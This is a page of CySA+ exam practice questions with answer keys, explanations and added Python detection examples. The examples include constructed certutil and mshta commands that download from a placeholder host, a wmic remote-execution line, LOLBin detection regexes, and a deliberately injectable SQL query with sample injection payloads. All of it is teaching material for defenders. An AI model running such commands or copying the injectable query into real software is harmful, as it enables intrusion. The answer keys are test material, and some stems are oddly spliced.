CompTIA CySA+ CS0-003 (CS0-003) — Questions 676–750

989 questions total · 14 pages · All types, answers revealed

Page 10 of 14

676
MCQ · medium

A security analyst is using Burp Suite to test an API endpoint. The analyst notices that the API returns detailed error messages when invalid input is provided, revealing database schema information. Which OWASP Top 10 category does this issue primarily relate to?

A. Injection
B. Security Misconfiguration
C. Broken Access Control
D. Cryptographic Failures
Answer: B

Verbose error messages are a classic security misconfiguration that can leak sensitive information.

Why this answer

Detailed error messages that reveal internal details such as table or column names are a form of security misconfiguration. OWASP A05:2021 Security Misconfiguration explicitly lists error handling that exposes stack traces or overly informative messages. The fix is to return a generic message (with a correlation ID) to the client and log the detail server-side; the leaked schema is also exactly what an attacker needs to turn a probe into a working injection payload, which is why this finding is usually reported alongside an injection test.

677
MCQ · hard

During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?

A. Host-based intrusion prevention system (HIPS)
B. Full disk encryption
C. Network segmentation with strict firewall rules
D. Application whitelisting
Answer: C

Segmentation limits the ability to connect to other hosts, hindering lateral movement.

Why this answer

Network segmentation with strict firewall rules (C) is the most effective control because it directly restricts the ability of an attacker who has compromised one host to initiate connections to other hosts. By enforcing least-privilege network access between segments (e.g., using VLANs and ACLs), lateral movement techniques such as port scanning, SMB relay, or RDP brute force are blocked at the network layer, regardless of the attacker's shell access.

Exam trap

CompTIA often tests the misconception that endpoint controls like HIPS or application whitelisting are sufficient to stop lateral movement, but the trap here is that once an attacker has a shell, they can often bypass or disable host-based controls, whereas network segmentation is a preventive control that operates independently of the compromised host's state.

How to eliminate wrong answers

Option A is wrong because a host-based intrusion prevention system (HIPS) monitors and blocks malicious behavior on the compromised host itself, but once the attacker has a shell, they can often disable or evade HIPS before pivoting; HIPS does not prevent network-level lateral movement to other hosts. Option B is wrong because full disk encryption protects data at rest on the compromised host's storage, but it does nothing to prevent the attacker from using the host as a pivot point to reach other systems over the network. Option D is wrong because application whitelisting controls which executables can run on the compromised host, but the attacker already has a shell and can use built-in OS tools (e.g., PowerShell, netcat) or living-off-the-land binaries to pivot; whitelisting does not block network connections to other hosts.

678
MCQ · hard

An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?

A. A legitimate process (e.g., svchost.exe) created in a suspended state and later resumed with changed memory contents
B. A process with the same name as a Windows system process but running from a temporary directory
C. A process injecting code into a legitimate running process
D. An unknown process making network connections to multiple internal IPs
Answer: A

Creation in suspended state with memory modification is classic hollowing indicator.

Why this answer

Process hollowing creates a legitimate executable in a suspended state (CREATE_SUSPENDED), unmaps or overwrites its image in memory with the payload, and then resumes the main thread. Because the on-disk path and process name are untouched, path-based checks such as option B do not catch it; the discriminating telemetry is the suspended creation followed by cross-process memory writes into the target before it resumes. Option C describes generic injection into a process that is already running, not hollowing, and option D is a network indicator that says nothing about how the process was built.
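As an added example (not part of the question bank), the telemetry pattern in option A expressed as detection logic: a suspended process creation, a cross-process write into the target's image region, and a thread resume by the same actor, matched in order on one PID. The event stream below is constructed, and the event and field names (process_create, remote_memory_write, thread_resume, CREATE_SUSPENDED) are assumed placeholders in the style of Sysmon/EDR schemas, not any vendor's real format.

```python
"""Added example (not from the question bank): flag a process-hollowing chain
in constructed EDR-style telemetry.

Hollowing shows up as a sequence on one target PID: a process created in a
suspended state, its image memory overwritten by another process, and the
main thread resumed. Event and field names are assumptions modelled loosely
on Sysmon/EDR schemas."""

from collections import defaultdict

# Constructed sample telemetry (not real logs). Each event carries the PID it acts on.
EVENTS = [
    {"ts": 1, "event": "process_create", "pid": 4100, "ppid": 3900,
     "image": r"C:\Windows\System32\svchost.exe", "flags": ["CREATE_SUSPENDED"]},
    {"ts": 2, "event": "remote_memory_write", "pid": 4100, "source_pid": 3900,
     "region": "image_base", "bytes": 212992},
    {"ts": 3, "event": "thread_resume", "pid": 4100, "source_pid": 3900},
    # Ordinary service start: a suspended create is common, but no remote write follows.
    {"ts": 4, "event": "process_create", "pid": 4200, "ppid": 704,
     "image": r"C:\Windows\System32\svchost.exe", "flags": ["CREATE_SUSPENDED"]},
    {"ts": 5, "event": "thread_resume", "pid": 4200, "source_pid": 704},
    # Classic injection into an already-running process: suspicious, but not hollowing.
    {"ts": 6, "event": "remote_memory_write", "pid": 800, "source_pid": 3900,
     "region": "heap", "bytes": 4096},
]

def find_hollowing(events):
    """Return (target_pid, actor_pid, image) for PIDs that show, in order:
    suspended create -> remote write to the image region -> resume by the writer."""
    state = defaultdict(dict)          # pid -> {"suspended": image, "written_by": pid}
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        pid = ev["pid"]
        if ev["event"] == "process_create" and "CREATE_SUSPENDED" in ev["flags"]:
            state[pid] = {"suspended": ev["image"]}
        elif ev["event"] == "remote_memory_write" and ev["region"] == "image_base":
            if "suspended" in state[pid]:
                state[pid]["written_by"] = ev["source_pid"]
        elif ev["event"] == "thread_resume":
            s = state.get(pid, {})
            if "suspended" in s and s.get("written_by") == ev["source_pid"]:
                hits.append((pid, ev["source_pid"], s["suspended"]))
            state.pop(pid, None)       # the chain is either complete or broken now
    return hits

if __name__ == "__main__":
    for pid, actor, image in find_hollowing(EVENTS):
        print(f"possible process hollowing: pid {pid} ({image}) written and resumed by pid {actor}")
```

The rule deliberately ignores the benign suspended start (PID 4200) and the heap injection into PID 800, so that only the full hollowing chain fires.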

679
MCQ · easy

A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?

A. Review the user's recent activity for other anomalies.
B. Add the IP address to the block list.
C. Contact the user to verify if they logged in.
D. Disable the user account immediately.
Answer: C

Quickest way to confirm if it was the user or a compromise.

Why this answer

Option C is correct because contacting the user is the fastest way to confirm whether the login was authorized (for example, a VPN exit node or personal travel). Disabling the account (D) or blocking the IP (B) before verification could cut off a legitimate user, and reviewing recent activity (A) is the right follow-up once the user denies the login. Note that a valid token and a passed MFA challenge do not rule out compromise: adversary-in-the-middle phishing kits replay the session cookie after the victim completes MFA, so if the user denies the login the session should be revoked and the alert escalated rather than closed.

680
Multi-Select · easy

A security analyst is using a vulnerability scanner to identify missing patches on Windows servers. The scanner uses plugins that reference Common Vulnerabilities and Exposures (CVE) identifiers. Which THREE of the following are components of a CVSS v3.1 base score vector?

Select 3 answers
A. Attack Vector (AV)
B. Confidentiality (C)
C. Privileges Required (PR)
D. Remediation Level (RL)
E. Exploitability (E)
Answers: A, B, C

AV is a base metric.

Why this answer

Attack Vector (AV), Privileges Required (PR), and Confidentiality (C) all belong to the CVSS v3.1 base metric group, together with Attack Complexity (AC), User Interaction (UI), Scope (S), Integrity (I) and Availability (A). Remediation Level (RL) and Exploit Code Maturity (E, which option E calls Exploitability) are temporal metrics: they adjust the base score over time but are not part of the base vector.

681
MCQ · easy

A security analyst is preparing a monthly dashboard for the board of directors. Which metric would best demonstrate the effectiveness of the security program in reducing risk?

A. Number of security incidents detected.
B. Mean time to detect (MTTD) and mean time to respond (MTTR).
C. Percentage of employees who completed security awareness training.
D. Number of firewall rules configured.
Answer: B

These metrics directly reflect the efficiency of detection and response processes.

Why this answer

Mean time to detect (MTTD) and mean time to respond (MTTR) directly quantify the security program's operational efficiency in identifying and containing threats, which reduces the window of exposure and potential damage. A lower MTTD/MTTR indicates faster detection and response, directly correlating with reduced risk from incidents. This makes it the best metric for demonstrating risk reduction effectiveness to the board.

Exam trap

CompTIA often tests the misconception that volume or compliance metrics (like incident count or training completion) directly indicate risk reduction, when in fact operational efficiency metrics (MTTD/MTTR) are the true measure of a security program's effectiveness in minimizing impact.

How to eliminate wrong answers

Option A is wrong because the number of security incidents detected is a volume metric that does not indicate how quickly or effectively incidents are handled; a high number could reflect better detection rather than higher risk, and it provides no insight into response quality. Option C is wrong because the percentage of employees who completed security awareness training is a compliance or training metric that measures awareness, not the operational effectiveness of the security program in detecting and responding to active threats. Option D is wrong because the number of firewall rules configured is a configuration metric that does not measure risk reduction; more rules can increase complexity and attack surface without improving security posture.

682
MCQ · medium

During an incident response, the SOC team identifies a data breach involving customer PII. Under GDPR, what is the maximum time frame to notify the supervisory authority?

A. 96 hours
B. 72 hours
C. 24 hours
D. 48 hours
Answer: B

Correct under GDPR Article 33.

Why this answer

GDPR Article 33 requires the controller to notify the supervisory authority without undue delay and, where feasible, not later than 72 hours after becoming aware of a personal data breach, unless the breach is unlikely to result in a risk to individuals. A late notification must be accompanied by the reasons for the delay, and the affected individuals themselves must be informed under Article 34 when the risk to them is high.

683
Multi-Select · hard

A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)

Select 3 answers
A. mshta.exe executing JavaScript from a remote URL
B. explorer.exe opening the Start menu
C. notepad.exe opening a .txt file in the user's Documents folder
D. wmic.exe creating a process on a remote system
E. certutil.exe downloading an executable from a remote server
Answers: A, D, E

Correct. MSHTA can run scripts, often used by attackers.

Why this answer

LOLBin abuse means signed, native binaries used in ways their normal role does not require: wmic creating a process on a remote host (ATT&CK T1047), mshta executing a script fetched from a URL (T1218.005), and certutil downloading or decoding a payload (T1105). Options B and C are those binaries doing exactly what they exist to do. bitsadmin is another common download LOLBin; the detection approach is the same, a rule on the binary name plus the command-line switches that indicate the abusive use.
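An added example (not from the question bank) that turns the three correct options into command-line detection rules and runs them over constructed process-creation events, including the two benign options and a benign certutil use that should not fire. The rule patterns and the event dict layout are assumptions; the IP addresses are from a documentation range.

```python
"""Added example (not from the question bank): score process-creation events
for LOLBin abuse. The patterns cover the behaviours in the question (mshta
pulling a remote script, certutil fetching or decoding a file, wmic spawning a
process on a remote host) plus bitsadmin; the event format is an assumed,
simplified Sysmon-style dict."""

import re

# Each rule: (binary name, case-insensitive regex over the command line, label).
LOLBIN_RULES = [
    ("mshta.exe",     r"https?://|javascript:|vbscript:",      "mshta remote/inline script"),
    ("certutil.exe",  r"-urlcache|-decode|-encode",            "certutil download/decode"),
    ("wmic.exe",      r"/node:\S+.*process\s+call\s+create",    "wmic remote process creation"),
    ("bitsadmin.exe", r"/transfer|/addfile",                   "bitsadmin download"),
]

def match_lolbin(event):
    """Return the rule label if the image name and command line hit a rule, else None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    for binary, pattern, label in LOLBIN_RULES:
        if image == binary and re.search(pattern, event["cmdline"], re.IGNORECASE):
            return label
    return None

def triage(events):
    """Map PID -> label for every event that matches a LOLBin abuse rule."""
    return {e["pid"]: label for e in events if (label := match_lolbin(e))}

# Constructed sample events (not real telemetry). 203.0.113.0/24 is a documentation range.
EVENTS = [
    {"pid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/update.hta"},
    {"pid": 2, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 3, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Documents\notes.txt"},
    {"pid": 4, "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": r'wmic.exe /node:FILESRV01 process call create "cmd.exe /c whoami"'},
    {"pid": 5, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/a.exe a.exe"},
    # Benign certutil use: listing the machine store, no download or decode switch.
    {"pid": 6, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -store My"},
]

if __name__ == "__main__":
    for pid, label in triage(EVENTS).items():
        print(pid, label)
```

Matching on the image name from the full path rather than on the command line's first token matters in practice: attackers routinely rename or copy LOLBins, and a rule keyed on the original file name on disk (or, better, the PE's original filename field where the EDR exposes it) survives that.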

684
MCQ · easy

A security analyst is conducting a vulnerability assessment of a web application. The assessment reveals that the application is vulnerable to SQL injection. Which of the following is the MOST effective remediation?

A. Upgrade the web application framework to the latest version
B. Deploy a web application firewall (WAF)
C. Use parameterized queries in the application code
D. Implement client-side input validation
Answer: C

Parameterized queries eliminate SQL injection vulnerabilities.

Why this answer

Parameterized queries (also known as prepared statements) are the most effective remediation for SQL injection because they separate SQL logic from user-supplied data by using placeholders. The database engine treats the input strictly as data, not executable code, which prevents an attacker from altering the query structure. This addresses the root cause at the application layer, unlike other controls that only mitigate or detect the attack.

Exam trap

CompTIA often tests the misconception that a WAF is a sufficient fix for SQL injection, but the trap here is that a WAF is a compensating control, not a remediation—the question asks for the 'most effective remediation,' which must address the root cause in the code.

How to eliminate wrong answers

Option A is wrong because upgrading the web application framework may patch known vulnerabilities but does not fix the insecure coding practice of concatenating user input into SQL statements; the SQL injection flaw remains if the code itself is not changed. Option B is wrong because a web application firewall (WAF) can detect and block some SQL injection payloads, but it is a reactive, signature-based control that can be bypassed with obfuscation or novel attack patterns, and it does not eliminate the underlying vulnerability. Option D is wrong because client-side input validation can be easily bypassed by an attacker using tools like Burp Suite or cURL to send crafted requests directly to the server, and it provides no security against server-side injection.
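An added example, not from the question bank, that serves this question and question 676 together: the concatenated query a scanner would flag beside its parameterized replacement, and a handler that returns the raw database error to the client beside one that logs the detail under a correlation ID and returns only that ID. It uses Python's built-in sqlite3 with a constructed in-memory table; the users schema and the handler return shapes are assumptions.

```python
"""Added example (not from the question bank): SQL injection via string
concatenation versus a parameterized query, and a verbose error handler
versus one that keeps database detail server-side. The schema and sample
rows are constructed; sqlite3 stands in for whatever database the API uses."""

import logging
import sqlite3
import uuid

log = logging.getLogger("api")

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users (username, email, is_admin) VALUES (?, ?, ?)",
                   [("alice", "alice@example.com", 0), ("bob", "bob@example.com", 1)])
    return db

def lookup_vulnerable(db, username):
    """The flaw: user input is pasted into the SQL text, so it can change the query."""
    query = f"SELECT username, email FROM users WHERE username = '{username}'"
    return db.execute(query).fetchall()

def lookup_parameterized(db, username):
    """The remediation: the value travels separately from the SQL and is only ever data."""
    query = "SELECT username, email FROM users WHERE username = ?"
    return db.execute(query, (username,)).fetchall()

def api_verbose(db, username):
    """Anti-pattern from question 676: the database error text reaches the client."""
    try:
        return {"status": 200, "body": lookup_vulnerable(db, username)}
    except sqlite3.Error as exc:
        return {"status": 500, "body": f"database error: {exc}"}

def api_hardened(db, username):
    """Detail goes to the server log under a correlation ID; the client gets only the ID."""
    try:
        return {"status": 200, "body": lookup_parameterized(db, username)}
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s query failed: %s", ref, exc)
        return {"status": 500, "body": f"internal error, reference {ref}"}

if __name__ == "__main__":
    db = make_db()
    payload = "x' OR 1=1 --"
    print(lookup_vulnerable(db, payload))      # every row, including bob's: the injection works
    print(lookup_parameterized(db, payload))   # []: the literal string matches nobody
    probe = "x' UNION SELECT 1 --"
    print(api_verbose(db, probe)["body"])      # the error text describes the query the attacker broke
    print(api_hardened(db, probe)["body"])     # the parameterized query just returns no rows
```

The UNION probe is the kind of input Burp's active scanner sends: against the concatenated query it produces a column-count error whose text tells the attacker how many columns to match, while against the parameterized query it is simply a username nobody has.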

685
MCQ · hard

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the evidence-source phase, which evidence source best supports or refutes the detection?

A. Increase the dashboard refresh interval
B. Move logs to cold storage immediately
C. Log normalization and field mapping in the parser
D. Disable all enrichment lookups
Answer: C

Detection rules depend on consistent normalized fields across sources.

Why this answer

Option C is correct because inconsistent field mapping (source IP, user, action) prevents the SIEM from correlating events correctly. Log normalization via a parser ensures that fields from the new cloud log source are transformed into a consistent schema (e.g., ECS or CIM), enabling analytics to function. Without fixing the parser, the data remains unusable regardless of other configuration changes.

Exam trap

The CS0-003 exam often tests the misconception that performance tuning (e.g., refresh intervals) or storage management (e.g., cold storage) can fix data quality issues, when the real problem is a misconfigured parser or normalization step in the ingestion pipeline.

How to eliminate wrong answers

Option A is wrong because increasing the dashboard refresh interval does not address the root cause of inconsistent field mapping; it only changes how often the dashboard updates, which would still show incomplete or misaligned data. Option B is wrong because moving logs to cold storage immediately would archive the data without resolving the parsing issue, making the logs inaccessible for real-time analytics and failing to fix the mapping inconsistency. Option D is wrong because disabling enrichment lookups strips context (asset, identity and threat-intelligence tags) from events without touching the field mapping that is actually broken.

686
MCQ · hard

A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is a legal/privacy stakeholder, which content choice is most appropriate?

A. No mention of the accepted risk
B. Only the analyst's personal opinion
C. Risk owner, reason, compensating controls, review date, and expiry
D. A permanent exception with no review
Answer: C

Risk acceptance must be accountable, time-bound, and visible. The report should be tuned to the legal/privacy stakeholder while preserving factual accuracy.

Why this answer

Option C is correct because when a business owner accepts delayed remediation for a production system, the report must formally document the risk acceptance. This includes the risk owner, the reason for accepting the risk, any compensating controls in place, a review date to reassess the risk, and an expiry date for the acceptance. For a legal/privacy stakeholder, this documentation provides an auditable trail that demonstrates due diligence and compliance with regulatory requirements, such as GDPR or HIPAA.

Exam trap

The CS0-003 exam often tests the misconception that a risk acceptance report can simply note the decision without detailing the compensating controls or expiry, leading candidates to choose an incomplete answer that omits critical audit trail elements.

How to eliminate wrong answers

Option A is wrong because omitting the accepted risk from the report would violate audit and compliance standards; legal/privacy stakeholders require full disclosure of all risks to assess liability and regulatory exposure. Option B is wrong because including only the analyst's personal opinion is subjective and lacks the objective, verifiable data needed for legal and privacy review; such opinions are not defensible in an audit or legal proceeding. Option D is wrong because a permanent exception with no review date removes the time-bound element: the accepted risk is never reassessed, which is exactly what an auditor or regulator will challenge.

687
MCQ · medium

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as?

A. Password spraying only
B. MFA fatigue or push-bombing attack
C. DNS tunnelling
D. SSL certificate expiry
Answer: B

Repeated unsolicited prompts that lead to approval are characteristic of MFA fatigue attacks.

Why this answer

Repeated MFA prompts that the user eventually approves out of frustration or habit is the hallmark of MFA fatigue (also called push-bombing). The attacker sends a flood of push notifications to the user's device, hoping the user will mistakenly approve one to stop the annoyance. This bypasses the MFA control without needing to compromise the second factor.

Exam trap

The CS0-003 exam often tests the distinction between 'MFA fatigue' and 'password spraying' — candidates mistakenly choose password spraying because they focus on the repeated attempts, but the key is that the attacker already has the password and is abusing the MFA approval process, not guessing passwords.

How to eliminate wrong answers

Option A is wrong because password spraying involves trying a few common passwords against many accounts, not targeting a single user with repeated MFA prompts. Option C is wrong because DNS tunnelling encodes data in DNS queries/responses to exfiltrate data or establish C2, not to overwhelm a user with MFA approval requests. Option D is wrong because an expired SSL/TLS certificate is an availability or configuration problem that produces browser warnings or failed connections, not repeated MFA push notifications.

688
MCQ · hard

An organization uses OpenSCAP to perform compliance scanning against STIGs for DoD environments. A scan reveals that several systems are non-compliant with STIG ID: V-XXXXX requiring 'The system must disable the guest account.' The configuration drift detection tool shows that the guest account was re-enabled after a recent patch. What is the MOST effective course of action?

A. Update the system baseline to enforce the guest account disabled state via Group Policy.
B. Apply an exception to the STIG requirement for these systems.
C. Re-run the OpenSCAP scan after the next patch cycle.
D. Manually disable the guest account on each non-compliant system.
Answer: A

Enforcing via Group Policy prevents future drift.

Why this answer

Configuration drift indicates that patches or other changes are reverting the setting. The most effective action is to enforce the baseline through the configuration management tool (here, Group Policy) so that the setting is reapplied automatically at the next policy refresh and any future drift corrects itself. Manually disabling the account (D) fixes today's drift but not its recurrence, re-running the scan (C) only measures the problem, and an exception (B) waives a requirement that is trivially enforceable.

689
Multi-Select · medium

An incident responder is performing containment of a ransomware incident that has encrypted files on several file servers. Which THREE actions are appropriate for long-term containment and recovery? (Select THREE)

Select 3 answers
A. Blocking the ransomware's command-and-control IP at the firewall
B. Patching the vulnerability exploited by the ransomware
C. Rebuilding affected servers from known-good backups
D. Rotating all service account credentials
E. Isolating the affected network segment
Answers: B, C, D

Patching addresses the root cause and prevents future exploitation.

Why this answer

Long-term containment aims to prevent recurrence and restore normal operations: patching closes the initial attack vector, rebuilding from known-good backups removes the malware and any persistence, and rotating credentials prevents re-entry with secrets the attacker already harvested. Options A and E are short-term containment steps taken earlier in the response to stop the spread; they do nothing about the root cause or the attacker's foothold.

690
Multi-Select · hard

A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)

Select 2 answers
A. Disable all identity alerts
B. Require a second signal such as new device, failed MFA, or mailbox rule creation
C. Add trusted VPN egress ranges as named/known locations
D. Treat every VPN login as malicious
Answers: B, C

Combining identity anomalies reduces false positives.

Why this answer

Option B is correct because requiring a second signal, such as a new device, a failed MFA challenge, or mailbox rule creation, adds corroboration that separates a genuine compromise from a user whose apparent location changed because of routing. Option C is correct because tagging the trusted VPN egress ranges as named locations lets the rule recognise that a login from the VPN concentrator's public address is not a geographic hop; without it, every user who signs in from home and then through the VPN appears to move to the datacentre's city within minutes. Together the two refinements cut the VPN noise without blinding the rule to real account takeover.

Exam trap

The CS0-003 exam often tests the misconception that disabling identity alerts is a valid refinement, but this would eliminate all identity-based detection, whereas the correct approach is to add context (trusted ranges and secondary signals) to reduce noise without losing detection capability.
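An added example (not from the question bank) covering this question and question 687: an impossible-travel rule that treats trusted VPN egress ranges as a known location and only fires with a corroborating signal, and a push-bombing rule that counts prompts inside a window and fires on a late approval. All events, the VPN range (a documentation prefix), the speed threshold and the window sizes are constructed assumptions.

```python
"""Added example (not from the question bank): two identity detections over
constructed sign-in and MFA-push events.

1. Impossible travel tuned as the SIEM question describes: logins from trusted
   VPN egress ranges count as a known location and are never used as a travel
   endpoint, and the alert fires only when a second signal (new device, failed
   MFA, new inbox rule) exists for the same user.
2. MFA fatigue / push-bombing: a burst of push prompts that ends in an approval.

The VPN range, speed threshold, window sizes and field names are assumptions."""

import ipaddress
import math

TRUSTED_VPN_RANGES = [ipaddress.ip_network("198.51.100.0/24")]  # assumed corporate VPN egress
MAX_KMH = 900.0   # faster than an airliner between two logins is treated as impossible

def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points given in degrees."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))

def is_trusted_egress(login):
    ip = ipaddress.ip_address(login["ip"])
    return any(ip in net for net in TRUSTED_VPN_RANGES)

def impossible_travel(logins, second_signals):
    """Return (user, earlier_ts, later_ts) for consecutive logins implying travel
    faster than MAX_KMH, skipping VPN-sourced logins and users with no second signal."""
    hits, last = [], {}
    for lg in sorted(logins, key=lambda l: l["ts"]):
        prev = last.get(lg["user"])
        if prev and not (is_trusted_egress(prev) or is_trusted_egress(lg)):
            km = haversine_km(prev["geo"], lg["geo"])
            hours = (lg["ts"] - prev["ts"]) / 3600.0
            if hours > 0 and km / hours > MAX_KMH and lg["user"] in second_signals:
                hits.append((lg["user"], prev["ts"], lg["ts"]))
        last[lg["user"]] = lg
    return hits

def push_bombing(pushes, window_s=600, min_prompts=5):
    """Return users who received >= min_prompts pushes within window_s and then approved one."""
    hits, recent = set(), {}
    for p in sorted(pushes, key=lambda p: p["ts"]):
        q = recent.setdefault(p["user"], [])
        q.append(p)
        q[:] = [x for x in q if p["ts"] - x["ts"] <= window_s]   # drop prompts outside the window
        if p["result"] == "approved" and len(q) >= min_prompts:
            hits.add(p["user"])
    return hits

# Constructed events. Geo points are New York and London; 198.51.100.x is the VPN egress.
LOGINS = [
    {"user": "alice", "ts": 0,    "ip": "203.0.113.5",  "geo": (40.71, -74.01)},
    {"user": "alice", "ts": 1800, "ip": "198.51.100.7", "geo": (51.51, -0.13)},  # VPN hop, suppressed
    {"user": "bob",   "ts": 0,    "ip": "203.0.113.9",  "geo": (40.71, -74.01)},
    {"user": "bob",   "ts": 1800, "ip": "192.0.2.44",   "geo": (51.51, -0.13)},  # NY -> London in 30 min
    {"user": "carol", "ts": 0,    "ip": "203.0.113.22", "geo": (40.71, -74.01)},
    {"user": "carol", "ts": 1800, "ip": "192.0.2.45",   "geo": (51.51, -0.13)},  # same, but no second signal
]
SECOND_SIGNALS = {"alice": "new_device", "bob": "new_inbox_rule"}
PUSHES = ([{"user": "dave", "ts": t, "result": "denied"} for t in range(0, 300, 60)]
          + [{"user": "dave", "ts": 330, "result": "approved"},
             {"user": "erin", "ts": 0, "result": "approved"}])

if __name__ == "__main__":
    print(impossible_travel(LOGINS, SECOND_SIGNALS))   # bob only
    print(push_bombing(PUSHES))                         # {'dave'}
```

Alice has a second signal but is suppressed because her second login came through the VPN; Carol travelled impossibly but has nothing corroborating it; only Bob, who both travelled and created an inbox rule, produces an alert.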

691
MCQ · medium

An organization is implementing a patch management process and wants to track compliance. They deploy patches to a test group of systems before rolling out to the entire environment. After patching the test group, they run a vulnerability scan and find that 95% of the vulnerabilities are resolved. What should the organization do next?

A. Run another scan on the test group in a week to confirm persistence.
B. Immediately deploy the patch to all systems without further testing.
C. Skip full deployment and rely on the test group results.
D. Verify the patch on test systems and then proceed with full deployment through change management.
Answer: D

Verification ensures patches are effective, then change management coordinates rollout.

Why this answer

After successful testing, the next step is to deploy the patch to the rest of the environment, following change management procedures.

692
MCQ · hard

A security team discovers a critical vulnerability in a widely used software component. The vulnerability has a CVSS score of 9.0, but there is no known exploit or patch available yet. However, the software vendor has released a workaround. According to the vulnerability management lifecycle, which action should the team prioritize first?

A. Wait for the vendor to release a patch before taking any action
B. Remove the affected component from all systems immediately
C. Increase monitoring of the affected systems but take no other action
D. Apply the workaround as a compensating control
Answer: D

Correct; compensating controls reduce risk when a patch is unavailable.

Why this answer

Since no patch is available, the team should apply compensating controls to mitigate the risk. Remediation typically involves patching, but if not possible, compensating controls are the next best step.

693
Multi-Select · hard

A security analyst is prioritizing vulnerabilities from a scan. Which TWO factors should be considered to determine the remediation priority? (Select TWO)

Select 2 answers
A. Exploit code availability
B. Vendor patch availability
C. Number of affected systems
D. CVSS base score
E. Age of the vulnerability
Answers: A, C

Public exploits increase the urgency for remediation.

Why this answer

Exploit code availability is a critical factor because if working exploit code is publicly available, the vulnerability is far more likely to be actively exploited, increasing the risk and urgency for remediation. This directly impacts the likelihood of a breach, making it a key priority driver beyond just the CVSS score. The number of affected systems determines the blast radius and the remediation effort, so it drives scheduling alongside exploit availability; a flaw present on a handful of hosts and one present across the fleet are not the same work item.

Exam trap

The CS0-003 exam often tests the misconception that CVSS base score alone determines priority, but the exam emphasizes that exploit availability and exposure (here, the number of affected systems) are more actionable for remediation prioritization.

694
MCQ · medium

A security analyst is reviewing a DAST scan result for a web application. The scanner reports a finding that allows an attacker to redirect users to a malicious site via a parameter in the URL. Which OWASP Top 10 category does this finding most likely belong to?

A. A08:2021 – Software and Data Integrity Failures
B. A03:2021 – Injection
C. A01:2021 – Broken Access Control
D. A05:2021 – Security Misconfiguration
Answer: D

Open redirect is keyed here as Security Misconfiguration; note the mapping caveat below.

Why this answer

An open redirect (CWE-601) lets an attacker supply a URL in a redirect parameter and bounce a victim to an attacker-controlled site, usually as a phishing lure that carries the trusted domain in the first link. It is not injection (no interpreter or query is altered) and not a software or data integrity failure. This bank keys it as A05:2021 Security Misconfiguration on the reasoning that the root cause is improper handling of the redirect parameter. Be aware, however, that OWASP's own CWE mapping for the 2021 list places CWE-601 under A01:2021 Broken Access Control, and that open redirect was a standalone category (A10:2013 Unvalidated Redirects and Forwards) until it was folded into the 2017 list. If you meet this item with both A01 and A05 on offer, the mapping OWASP publishes favours A01; choose by how the stem frames the flaw.

695
MCQ · easy

A security analyst notices a single external IP address attempting to log in to multiple user accounts on the company's VPN server over the past hour. All attempts have failed. What should the analyst do FIRST?

A. Block the IP address at the firewall.
B. Notify law enforcement.
C. Verify the logs and escalate to the incident response team.
D. Disable the VPN server.
Answer: C

Verifying logs confirms the incident, and escalation ensures proper handling.

Why this answer

Option C is correct because the first step in incident response is to verify the logs to confirm the activity is not a false positive (e.g., a misconfigured client or an authorized test) and then escalate to the incident response team for coordinated action. This aligns with the NIST SP 800-61 incident response lifecycle, where detection and analysis precede containment. Blocking or disabling without verification could disrupt legitimate access or destroy forensic evidence.

Exam trap

CompTIA often tests the candidate's ability to resist the urge to immediately contain or notify external parties; the trap here is choosing a reactive containment step (blocking or disabling) before performing the critical validation and escalation step required by the incident response framework.

How to eliminate wrong answers

Option A is wrong because blocking the IP at the firewall without first verifying the logs may be premature; the IP could be a shared NAT address or a false positive, and blocking it could prevent further analysis or alert the attacker. Option B is wrong because law enforcement is typically notified only after the incident is confirmed, scoped, and deemed criminal in nature; notifying them as a first step wastes resources and may violate chain-of-custody procedures. Option D is wrong because disabling the entire VPN server is an extreme containment measure that would deny service to all legitimate users and should only be considered after verification and as part of a coordinated incident response plan.

696
Multi-Select · hard

A security analyst is performing an API vulnerability test. Which THREE of the following are common API vulnerabilities according to OWASP? (Select THREE.)

Select 3 answers
A. SQL injection in the API endpoint
B. Excessive Data Exposure
C. Cross-Site Request Forgery (CSRF)
D. Mass Assignment
E. Broken Object Level Authorization (BOLA)
Answers: B, D, E

APIs may expose more data than necessary.

Why this answer

